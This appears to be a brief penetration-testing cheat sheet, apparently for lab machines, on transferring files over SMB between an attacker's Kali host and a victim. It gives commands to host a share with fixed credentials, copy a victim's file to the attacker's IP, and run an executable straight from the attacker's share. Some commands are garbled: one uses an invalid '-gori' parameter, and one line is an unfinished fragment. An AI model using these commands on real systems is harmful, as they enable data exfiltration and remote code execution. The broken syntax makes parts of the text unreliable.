SMB file transferring

Method1:

  • you need to have a directory with the name specified.

smbserver.py gori $(pwd) -smb2support -user gori -pass gorigori

Now on the victim's machine, run

New-PSDrive -Name "gori" -PSProvider "FileSystem" -gori "\\10.10.14.131\gori"

Method 2:

$pass=convertto-securestring 'gorigori' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('gori', $pass)
$cred to check 

On victim, we can go to "gori" directory to see the shared drive.

i,.e) cd gori:

On Windows victim (send file):

 copy C:\temp\file.txt \\IP\gori

Method 3 (easy):

smbserver.py kali . 
On victim's \\10.10.16.18\kali\FILE_NAME.exe "whoami" 

whoami will confirm that it's running

Last updated